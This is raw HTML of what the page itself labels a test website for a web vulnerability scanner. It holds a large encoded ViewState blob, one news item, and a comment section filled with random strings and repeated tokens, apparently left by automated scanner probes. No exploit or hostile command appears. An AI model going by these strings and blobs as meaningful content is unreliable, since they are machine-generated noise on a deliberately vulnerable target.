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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLx8/+sDQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIoRU598u+JEFqPSTWlDEQyf1SoR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hteLUTPmLvVvWGoKVsqwffTWrynmiZJjjNNrFbJqoeGxqjDAeUEibSWZKfhBNrYPufKMhRZtpWivRWihDBNIpGmVVtZKWnVGxBNlZKlKPDseXSiBChCNjYOJKkeUomKYiPxUUjQdvqoTXhrgJERNURXvVSJHuSyCKjmFBnBSnTxQuRVWCXsrEtRrqXdiLNJYKyMeKUZiymjAyJVQacjQMmjJubhLnoNybvhmPaSJPTmBlGMxhKFxWEyRHaQCDfaINIDOOekRqJIyvXkRlNPpwRLArqrQdFnNXSQnsnNGFimrcVdkdhrvcLNawKfXGbpgTYCreZKFyKORIDAmMDNwbgUOxWHJYTcppjZcSRICfSaiLoIwcsynvUcJRvgofgZDYEtkTRsInrJOfqOGciQtehkXBtspmqhSKZBJTowumOrCqtsJBUOjGfcZleenjYOmQqPOcHYKpwJcKsqTbqjPApvTYKqhyjCBYPnsMGJbicWHWPOdcVNgQZdvHcKHIubEolYjXXVOHkAGHJcfYtVYxrmhgFcMuAKcnceHVGSYuZqHjKELJMtuCJtTelpEbKUGlrDetQTQxnhiWcQwgRRnuGbogSpbqhvqbAvgUnpXtWCoTmQwkTOgmhEXsyTsdssMiuZZiyqYoRWYNXrxOvIElbIPZxEQClRNjuYRceqvYxwcexZbILMeReTKNNXELVhpTbfdmACtUPGYkWqfRkkfABaVqYCuVKJAGGaYBFNITecslcuvgqfMpRUqXYMQGcNkwqnKqlrejOiRGJDGIXhCCWcvvBCMAyVZdnYJCorcxwYYybKfUUfukSoQcnEoxxDfJaEkkBSnJdjlwcxZCAweULTcKytxsqwVEwrSbBnEUmFFIFKxHRRJpDcraVpXiglKVtBPcAAffsHIvEfmXfEtetcNvQEfrNfhoZXNcHXJgSOYCVMdCtUKhyOeZakrcGshkesTuxfOvgRyjLkbspmmepdlNpgSjCmOdTptmxFPZXdOySQQejMVmsTWwjjwVjqDstDjgyxXJsZJCPNOSfDyiHBmoFODMODbrDBTkjqJnkHeghLkQxYvZwiaoUgsyFXoNgyEiHRMijfCYsTRXmbLdovdyfNYMxPJPhZLwyQVWIWefQMHYAOHLfZYNUXHWAiNDqHDjLSKiGymhEvFdgmYbnSLNWUObttBNBFlRdsYeYUGtjxcKRltJvkCRZhTdMcfmwvlSFStBftMYXRKThRtkqSnqYQpwWGjaUXTVnMJfFNqZBhjWAOsRHEOUOVyRPFimoNUctqMPJOqOSPqopZAZbciADxuCDqbeFoqhLytqdSFacFUalfiAaEXyLVVARjeURmQfSjvhLBvbfEjEHbvEwAySFfHbyKZWWtPVnpuGJVfbaXQdjiRyJFWKTPcwkRSiTqrywtStjaUSlBgdwFdwiCArcGLuidxZhGkyxeGPuwRdlJFbcwfcFbKkpsFhAbYrYvHHtUfdBIihAXScvutQwGYCjRKaVtoFZpYNDLKkyXlQWuQXaodXXcTdXGNgEPKEaTLSqYmnAfOmQSDaYaIuKhPXxVJiEPTCjlJfsxUULcMOEDPxxTsxNmInHvKTZxpWIwhwfYLQvSGtdcZfqKjLOAMbOjwxLToNPdkfoEqUUcKvMGkYvoknOLBSKUMqsjqOnsyhpxNecJtiXJuVjREDGbdnxhLHoAFcrsPWDBiuwwbZwDMaoPefbquLLLJAINqTAEUGQbKFiQhOQoZDVgpSudhQlohBNFBkuYFIFDBMXphNIRJdEwSYXKSLbESKoeinFqrwRZkXtFnLjxaUeUEIqyPcyLNIgOXRJZcFpSUHXABHlIdwPSYLisxTahlVjyeEaYmBuocjljZpsoOQHPuEwPcbZSuAmwGdLtdwJkWXMTuXkSkZFasVifQoRGwhuQkVlMVrCOALNMiTVZgDuovHQtGZrbbAhAYTlbgHWCjpAACoCPdoNkZPUruOIRpLQlHlZZnBrRnBrrNhgEfbGSYexxpZaECmyHDNOxnRnMdRBTchVlCBJDONoaGeLFMTSXUgVeeLPbotSJWaeXBnXpJuHceqlFGUIkOQIUVdhIYaMOWfkCRHvNx</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">@</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">+</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 